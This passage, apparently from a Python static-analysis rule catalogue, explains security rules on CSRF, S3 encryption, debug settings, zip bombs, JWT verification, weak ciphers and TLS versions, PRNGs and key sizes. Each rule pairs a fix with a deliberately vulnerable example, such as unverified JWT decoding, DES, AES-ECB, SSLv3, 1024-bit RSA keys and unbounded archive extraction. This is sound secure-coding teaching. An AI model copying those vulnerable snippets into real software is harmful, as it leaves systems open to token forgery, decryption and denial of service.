  • the CSRFProtect module should be used (and not disabled further with WTF_CSRF_ENABLED set to false):
app = Flask(__name__)
csrf = CSRFProtect()
csrf.init_app(app) # Compliant
  • and it is recommended to not disable the CSRF protection on specific views or forms:
@app.route('/example/', methods=['POST']) # Compliant
def example():
    return 'example '

class unprotectedForm(FlaskForm):
    class Meta:
        csrf = True # Compliant

    name = TextField('name')
    submit = SubmitField('submit')

See

python:S6245

Server-side encryption (SSE) encrypts an object (not the metadata) as it is written to disk (where the S3 bucket resides) and decrypts it as it is read from disk. This doesn’t change the way the objects are accessed: as long as the user has the necessary permissions, objects are retrieved as if they were unencrypted. Thus, SSE only helps in the event of disk thefts, improper disposal of disks, and other attacks on the AWS infrastructure itself.

There are three SSE options:

  • Server-Side Encryption with Amazon S3-Managed Keys (SSE-S3)
    • AWS manages encryption keys and the encryption itself (with AES-256) on its own.
  • Server-Side Encryption with Customer Master Keys (CMKs) Stored in AWS Key Management Service (SSE-KMS)
    • AWS manages the encryption (AES-256) of objects and encryption keys provided by the AWS KMS service.
  • Server-Side Encryption with Customer-Provided Keys (SSE-C)
    • AWS manages only the encryption (AES-256) of objects with encryption keys provided by the customer. AWS doesn’t store the customer’s encryption keys.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure needs to comply with some regulations, like HIPAA or PCI DSS, and other standards.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to use SSE. Choosing the appropriate option depends on the level of control required for the management of encryption keys.

Sensitive Code Example

Server-side encryption is not used:

bucket = s3.Bucket(self,"bucket",
    encryption=s3.BucketEncryption.UNENCRYPTED       # Sensitive
)

The default value of encryption is KMS if encryptionKey is set. Otherwise, if both parameters are absent, the bucket is unencrypted.

Compliant Solution

Server-side encryption with Amazon S3-Managed Keys is used:

bucket = s3.Bucket(self,"bucket",
    encryption=s3.BucketEncryption.S3_MANAGED
)

# Alternatively with a KMS key managed by the user.

bucket = s3.Bucket(self,"bucket",
    encryptionKey=access_key
)

See

python:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers or applications distributed to end users.

Sensitive Code Example

from django.conf import settings

settings.configure(DEBUG=True)  # Sensitive when set to True
settings.configure(DEBUG_PROPAGATE_EXCEPTIONS=True)  # Sensitive when set to True

def custom_config(config):
    settings.configure(default_settings=config, DEBUG=True)  # Sensitive

Django’s "settings.py" or "global_settings.py" configuration file:

# NOTE: The following code raises issues only if the file is named "settings.py" or "global_settings.py". This is the default
# name of Django configuration file

DEBUG = True  # Sensitive
DEBUG_PROPAGATE_EXCEPTIONS = True  # Sensitive
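A safer pattern (a sketch, not official Django guidance; the `DJANGO_DEBUG` variable name and `debug_enabled` helper are illustrative) is to derive the flag from the environment so that production defaults to `False`:

```python
import os

def debug_enabled(environ=os.environ):
    # Debug is off unless explicitly opted into, so production defaults stay safe.
    return environ.get("DJANGO_DEBUG", "") == "1"

DEBUG = debug_enabled()
DEBUG_PROPAGATE_EXCEPTIONS = DEBUG
```

This keeps the debug switch out of the committed settings file entirely.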

See

python:S6252

S3 buckets can be versioned. When the S3 bucket is unversioned it means that a new version of an object overwrites an existing one in the S3 bucket.

It can lead to unintentional or intentional information loss.

Ask Yourself Whether

  • The bucket stores information that requires high availability.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to enable S3 versioning and thus to have the possibility to retrieve and restore different versions of an object.

Sensitive Code Example

bucket = s3.Bucket(self, "bucket",
    versioned=False       # Sensitive
)

The default value of versioned is False, so the absence of this parameter is also sensitive.

Compliant Solution

bucket = s3.Bucket(self, "bucket",
    versioned=True
)

See

python:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data that expands into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers compress highly redundant data (e.g. a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the ratio between compressed and uncompressed data; in general, the compression ratio of most legitimate archives is between 1 and 3.
  • Define and control the threshold for maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if their number exceeds a predefined threshold; in particular, it is not recommended to recursively expand archives (an archive entry can itself be an archive).

Sensitive Code Example

For tarfile module:

import tarfile

tfile = tarfile.open("TarBomb.tar")
tfile.extractall('./tmp/')  # Sensitive
tfile.close()

For zipfile module:

import zipfile

zfile = zipfile.ZipFile('ZipBomb.zip', 'r')
zfile.extractall('./tmp/') # Sensitive
zfile.close()

Compliant Solution

For tarfile module:

import tarfile

THRESHOLD_ENTRIES = 10000
THRESHOLD_SIZE = 1000000000
THRESHOLD_RATIO = 10

totalSizeArchive = 0
totalEntryArchive = 0

tfile = tarfile.open("TarBomb.tar")
for entry in tfile:
  tarinfo = tfile.extractfile(entry)

  totalEntryArchive += 1
  sizeEntry = 0
  result = b''
  while True:
    sizeEntry += 1024
    totalSizeArchive += 1024

    ratio = sizeEntry / entry.size
    if ratio > THRESHOLD_RATIO:
      # ratio between compressed and uncompressed data is highly suspicious, looks like a Zip Bomb Attack
      break

    chunk = tarinfo.read(1024)
    if not chunk:
      break

    result += chunk

  if totalEntryArchive > THRESHOLD_ENTRIES:
    # too many entries in this archive can lead to inode exhaustion of the system
    break

  if totalSizeArchive > THRESHOLD_SIZE:
    # the uncompressed data size is too large for the application's resource capacity
    break

tfile.close()

For zipfile module:

import zipfile

THRESHOLD_ENTRIES = 10000
THRESHOLD_SIZE = 1000000000
THRESHOLD_RATIO = 10

totalSizeArchive = 0
totalEntryArchive = 0

zfile = zipfile.ZipFile('ZipBomb.zip', 'r')
for zinfo in zfile.infolist():
    print('File', zinfo.filename)
    data = zfile.read(zinfo)

    totalEntryArchive += 1

    totalSizeArchive = totalSizeArchive + len(data)
    ratio = len(data) / zinfo.compress_size
    if ratio > THRESHOLD_RATIO:
      # ratio between compressed and uncompressed data is highly suspicious, looks like a Zip Bomb Attack
      break

    if totalSizeArchive > THRESHOLD_SIZE:
      # the uncompressed data size is too large for the application's resource capacity
      break

    if totalEntryArchive > THRESHOLD_ENTRIES:
      # too many entries in this archive can lead to inode exhaustion of the system
      break

zfile.close()
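The streaming checks above can be complemented with a cheap pre-check on the archive's central-directory metadata before any data is read (a sketch; the thresholds reuse the values above, and `archive_looks_safe` is a hypothetical helper). Since metadata can lie, the per-chunk checks remain necessary:

```python
import zipfile

THRESHOLD_ENTRIES = 10000
THRESHOLD_SIZE = 1000000000
THRESHOLD_RATIO = 10

def archive_looks_safe(archive):
    # Inspect the sizes declared in the central directory before extracting
    # anything. This is cheap, but declared sizes are attacker-controlled,
    # so streaming checks during extraction are still required.
    with zipfile.ZipFile(archive) as zf:
        infos = zf.infolist()
        if len(infos) > THRESHOLD_ENTRIES:
            return False
        if sum(i.file_size for i in infos) > THRESHOLD_SIZE:
            return False
        for i in infos:
            if i.compress_size and i.file_size / i.compress_size > THRESHOLD_RATIO:
                return False
    return True
```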

See

python:S5659

This vulnerability allows forging of JSON Web Tokens to impersonate other users.

Why is this an issue?

JSON Web Tokens (JWTs), a popular method of securely transmitting information between parties as a JSON object, can become a significant security risk when they are not properly signed with a robust cipher algorithm, left unsigned altogether, or if the signature is not verified. This vulnerability class allows malicious actors to craft fraudulent tokens, effectively impersonating user identities. In essence, the integrity of a JWT hinges on the strength and presence of its signature.

What is the potential impact?

When a JSON Web Token is not appropriately signed with a strong cipher algorithm or if the signature is not verified, it becomes a significant threat to data security and the privacy of user identities.

Impersonation of users

JWTs are commonly used to represent user authorization claims. They contain information about the user’s identity, user roles, and access rights. When these tokens are not securely signed, it allows an attacker to forge them. In essence, a weak or missing signature gives an attacker the power to craft a token that could impersonate any user. For instance, they could create a token for an administrator account, gaining access to high-level permissions and sensitive data.

Unauthorized data access

When a JWT is not securely signed, it can be tampered with by an attacker, and the integrity of the data it carries cannot be trusted. An attacker can manipulate the content of the token and grant themselves permissions they should not have, leading to unauthorized data access.

How to fix it in PyJWT

Code examples

The following code contains an example of JWT decoding without verification of the signature.

Noncompliant code example

import jwt

jwt.decode(token, verify=False) # Noncompliant

Compliant solution

By default, verification is enabled for the method decode.

import jwt

jwt.decode(token, key, algorithms="HS256")

How does this work?

Verify the signature of your tokens

Resolving a vulnerability concerning the validation of JWT token signatures is mainly about incorporating a critical step into your process: validating the signature every time a token is decoded. Just having a signed token using a secure algorithm is not enough. If you are not validating signatures, they are not serving their purpose.

Every time your application receives a JWT, it needs to decode the token to extract the information contained within. It is during this decoding process that the signature of the JWT should also be checked.

To resolve the issue follow these instructions:

  1. Use framework-specific functions for signature verification: Most programming frameworks that support JWTs provide specific functions to not only decode a token but also validate its signature simultaneously. Make sure to use these functions when handling incoming tokens.
  2. Handle invalid signatures appropriately: If a JWT’s signature does not validate correctly, it means the token is not trustworthy, indicating potential tampering. The action to take on encountering an invalid token should be denying the request carrying it and logging the event for further investigation.
  3. Incorporate signature validation in your tests: When you are writing tests for your application, include tests that check the signature validation functionality. This can help you catch any instances where signature verification might be unintentionally skipped or bypassed.

By following these practices, you can ensure the security of your application’s JWT handling process, making it resistant to attacks that rely on tampering with tokens. Validation of the signature needs to be an integral and non-negotiable part of your token handling process.
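To illustrate the principle with only the standard library (a simplified `payload.signature` token format, not a real JWT; `sign` and `verify` are illustrative helpers), verification recomputes the HMAC over the payload and rejects the token on any mismatch:

```python
import base64
import hashlib
import hmac

def sign(payload: bytes, key: bytes) -> bytes:
    # Token = base64(payload) "." base64(HMAC-SHA256(key, payload))
    mac = hmac.new(key, payload, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(payload) + b"." + base64.urlsafe_b64encode(mac)

def verify(token: bytes, key: bytes) -> bytes:
    # Never decode-and-trust: recompute the signature and compare it in
    # constant time before using anything from the payload.
    payload_b64, _, mac_b64 = token.partition(b".")
    payload = base64.urlsafe_b64decode(payload_b64)
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, base64.urlsafe_b64decode(mac_b64)):
        raise ValueError("invalid signature")
    return payload
```

Real JWT libraries such as PyJWT perform this check for you when verification is left enabled.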

Going the extra mile

Securely store your secret keys

Ensure that your secret keys are stored securely. They should not be hard-coded into your application code or checked into your version control system. Instead, consider using environment variables, secure key management systems, or vault services.

Rotate your secret keys

Even with the strongest cipher algorithms, there is a risk that your secret keys may be compromised. Therefore, it is a good practice to periodically rotate your secret keys. By doing so, you limit the amount of time that an attacker can misuse a stolen key. When you rotate keys, be sure to allow a grace period where tokens signed with the old key are still accepted to prevent service disruptions.

Resources

Standards

python:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Cryptodome

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

from Crypto.Cipher import DES # pycryptodome
from Cryptodome.Cipher import DES # pycryptodomex

cipher = DES.new(key, DES.MODE_OFB) # Noncompliant

Compliant solution

from Crypto.Cipher import AES # pycryptodome
from Cryptodome.Cipher import AES # pycryptodomex

cipher = AES.new(key, AES.MODE_CCM)

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Standards

python:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB (Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

For RSA, the weakest configurations either use no padding at all or use the PKCS#1 v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in PyCrypto

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

from Crypto.Cipher import AES

AES.new(key, AES.MODE_ECB) # Noncompliant

Example with an asymmetric cipher, RSA:

from Crypto.Cipher import PKCS1_v1_5

PKCS1_v1_5.new(key) # Noncompliant

Compliant solution

Since PyCrypto is not supported anymore, another library should be used. In the current context, Cryptodome uses a similar API.

For the AES symmetric cipher, use the GCM mode:

from Crypto.Cipher import AES

AES.new(key, AES.MODE_GCM)

For the RSA asymmetric cipher, use the Optimal Asymmetric Encryption Padding (OAEP):

from Crypto.Cipher import PKCS1_OAEP

PKCS1_OAEP.new(key)

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Carter-Wegman + CTR
  • EAX: encrypt-then-authenticate-then-translate
  • IAPM: Integrity Aware Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

python:S5300

This rule is deprecated, and will eventually be removed.

Sending emails is security-sensitive and can expose an application to a large range of vulnerabilities.

Information Exposure

Emails often contain sensitive information which might be exposed to an attacker if they can add an arbitrary address to the recipient list.

Spamming / Phishing

A malicious user can abuse email-based features to send spam or phishing content.

Dangerous Content Injection

Emails can contain HTML and JavaScript code, so they can be used for XSS attacks.

Email Headers Injection

Email fields such as subject, to, cc, bcc, and from are set in email "headers". Using unvalidated user input to set those fields might allow attackers to inject newline characters into headers and craft malformed SMTP requests. Although modern libraries filter newline characters by default, user data used in email headers should always be validated.
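A minimal validation sketch (a hypothetical helper, not part of any mail library) that rejects CR/LF before a user-supplied value reaches a header:

```python
def safe_header(value: str) -> str:
    # Newline characters in a header value would let an attacker inject
    # additional headers (e.g. extra Bcc recipients) into the raw message.
    if "\r" in value or "\n" in value:
        raise ValueError("newline characters are not allowed in email headers")
    return value
```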

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Unvalidated user input is used to set email headers.
  • Email content contains data provided by users that is not sanitized.
  • The email recipient list or body is based on user input.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use an email library which sanitizes headers (Flask-Mail or django.core.mail).
  • Use HTML escape functions to sanitize every piece of data used in the email body.
  • Verify the application logic to make sure that email-based features cannot be abused to:
    • Send arbitrary emails for spamming or phishing
    • Disclose sensitive email content

Sensitive Code Example

smtplib

import smtplib

def send(from_email, to_email, msg):
  server = smtplib.SMTP('localhost', 1025)
  server.sendmail(from_email, to_email, msg) # Sensitive

Django

from django.core.mail import send_mail

def send(subject, msg, from_email, to_email):
  send_mail(subject, msg, from_email, [to_email]) # Sensitive

Flask-Mail

from flask import Flask
from flask_mail import Mail, Message

app = Flask(__name__)

def send(subject, body, from_email, to_email):
    mail = Mail(app)
    msg = Message(subject, [to_email], body, sender=from_email)
    mail.send(msg) # Sensitive

See

python:S4787

This rule is deprecated; use S4426, S5542, S5547 instead.

Encrypting data is security-sensitive. It has led in the past to the following vulnerabilities:

Proper encryption requires both the encryption algorithm and the key to be strong. Obviously the private key needs to remain secret and be renewed regularly. However, these are not the only ways to defeat or weaken encryption.

This rule flags function calls that initiate encryption/decryption.

Ask Yourself Whether

  • the private key might not be random or strong enough, or the same key might be reused for a long time.
  • the private key might be compromised. It can happen when it is stored in an unsafe place or when it was transferred in an unsafe manner.
  • the key exchange is made without properly authenticating the receiver.
  • the encryption algorithm is not strong enough for the level of protection required. Note that encryption algorithms strength decreases as time passes.
  • the chosen encryption library is deemed unsafe.
  • a nonce is used, and the same value is reused multiple times, or the nonce is not random.
  • the RSA algorithm is used, and it does not incorporate an Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.
  • the CBC (Cipher Block Chaining) algorithm is used for encryption, and its IV (Initialization Vector) is not generated using a secure random algorithm, or it is reused.
  • the Advanced Encryption Standard (AES) encryption algorithm is used with an insecure mode. See the recommended practices for more information.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Generate encryption keys using secure random algorithms.
  • When generating cryptographic keys (or key pairs), it is important to use a key length that provides enough entropy against brute-force attacks. For the Blowfish algorithm the key should be at least 128 bits long, while for the RSA algorithm it should be at least 2048 bits long.
  • Regenerate the keys regularly.
  • Always store the keys in a safe location and transfer them only over safe channels.
  • If there is an exchange of cryptographic keys, check first the identity of the receiver.
  • Only use strong encryption algorithms. Check regularly that the algorithm is still deemed secure. It is also imperative that they are implemented correctly. Use only encryption libraries which are deemed secure. Do not define your own encryption algorithms as they will most probably have flaws.
  • When a nonce is used, generate it randomly every time.
  • When using the RSA algorithm, incorporate an Optimal Asymmetric Encryption Padding (OAEP).
  • When CBC is used for encryption, the IV must be random and unpredictable. Otherwise it exposes the encrypted value to cryptanalysis attacks like chosen-plaintext attacks. Thus a secure random algorithm should be used. An IV should be associated with one and only one encryption cycle, because the IV’s purpose is to ensure that the same plaintext encrypted twice will yield two different ciphertexts.
  • The Advanced Encryption Standard (AES) encryption algorithm can be used with various modes. Galois/Counter Mode (GCM) with no padding should be preferred to the following combinations, which are not secure:
    • Electronic Codebook (ECB) mode: Under a given key, any given plaintext block always gets encrypted to the same ciphertext block. Thus, it does not hide data patterns well. In some senses, it doesn’t provide serious message confidentiality, and it is not recommended for use in cryptographic protocols at all.
    • Cipher Block Chaining (CBC) with PKCS#5 padding (or PKCS#7) is susceptible to padding oracle attacks.
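For the CBC point above, a fresh, unpredictable IV can be drawn from the standard library's CSPRNG (a sketch; `new_iv` is an illustrative helper, and the cipher itself should come from a vetted library):

```python
import secrets

AES_BLOCK_SIZE = 16  # AES block size in bytes; CBC IVs must match it

def new_iv() -> bytes:
    # A CSPRNG-backed IV, generated once per encryption and never reused.
    return secrets.token_bytes(AES_BLOCK_SIZE)
```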

Sensitive Code Example

cryptography module

from cryptography.fernet import Fernet
from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305, AESGCM, AESCCM
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.ciphers import Cipher


def encrypt(key):
    Fernet(key)  # Sensitive
    ChaCha20Poly1305(key)  # Sensitive
    AESGCM(key)  # Sensitive
    AESCCM(key)  # Sensitive


private_key = rsa.generate_private_key()  # Sensitive


def encrypt2(algorithm, mode, backend):
    Cipher(algorithm, mode, backend)  # Sensitive

pynacl library

from nacl.public import Box
from nacl.secret import SecretBox


def public_encrypt(secret_key, public_key):
    Box(secret_key, public_key)  # Sensitive


def secret_encrypt(key):
    SecretBox(key)  # Sensitive

See

python:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that the encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Python Standard Library

Code examples

Noncompliant code example

import ssl

ssl.SSLContext(ssl.PROTOCOL_SSLv3) # Noncompliant

Compliant solution

import ssl

context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.minimum_version = ssl.TLSVersion.TLSv1_3

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS v1.3 is available, using TLS v1.2 is still considered a good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback arises when the framework in use is outdated: its TLS v1.2 settings may still enable older cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.
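With Python's standard `ssl` module, pinning the minimum protocol version is a one-line setting on the context (a client-side sketch):

```python
import ssl

# create_default_context() already disables SSLv2/SSLv3; raising
# minimum_version additionally rules out TLS 1.0 and 1.1.
context = ssl.create_default_context()
context.minimum_version = ssl.TLSVersion.TLSv1_2
```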

Resources

Articles & blog posts

Standards

python:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. This is the case for all encryption mechanisms, or when a secret value such as a password is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Only use random number generators which are recommended by OWASP or any other trusted organization.
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

import random

random.getrandbits(1) # Sensitive
random.randint(0,9) # Sensitive
random.random()  # Sensitive

# the following functions are often misused to generate salts by selecting characters from a string, e.g. "abcdefghijk"
random.sample(['a', 'b'], 1)  # Sensitive
random.choice(['a', 'b'])  # Sensitive
random.choices(['a', 'b'])  # Sensitive
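Compliant alternatives exist in the standard library's `secrets` module, which is backed by a CSPRNG (a sketch mirroring the calls above; variable names are illustrative):

```python
import secrets
import string

bit = secrets.randbits(1)      # CSPRNG replacement for random.getrandbits(1)
digit = secrets.randbelow(10)  # replacement for random.randint(0, 9)
token = secrets.token_hex(16)  # 32 hex characters, suitable for session tokens

# Salt generation by picking characters from an alphabet, done safely:
alphabet = string.ascii_letters + string.digits
salt = "".join(secrets.choice(alphabet) for _ in range(16))
```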

See

python:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that the encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in pyca

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend

backend = default_backend()

private_key = rsa.generate_private_key(public_exponent=65537, key_size=1024, backend=backend) # Noncompliant
public_key  = private_key.public_key()

Here is an example of a key generation with the Digital Signature Algorithm (DSA):

from cryptography.hazmat.primitives.asymmetric import dsa
from cryptography.hazmat.backends import default_backend

backend = default_backend()

private_key = dsa.generate_private_key(key_size = 1024, backend = backend) # Noncompliant
public_key  = private_key.public_key()

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.backends import default_backend

backend = default_backend()

private_key = ec.generate_private_key(curve=ec.SECT163R2(), backend=backend)  # Noncompliant
public_key  = private_key.public_key()

Compliant solution

from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend

backend = default_backend()

private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048, backend=backend)
public_key  = private_key.public_key()

from cryptography.hazmat.primitives.asymmetric import dsa
from cryptography.hazmat.backends import default_backend

backend = default_backend()

private_key = dsa.generate_private_key(key_size=2048, backend=backend)
public_key  = private_key.public_key()

from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.backends import default_backend

backend = default_backend()

private_key = ec.generate_private_key(curve=ec.SECT409R1(), backend=backend)
public_key  = private_key.public_key()

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

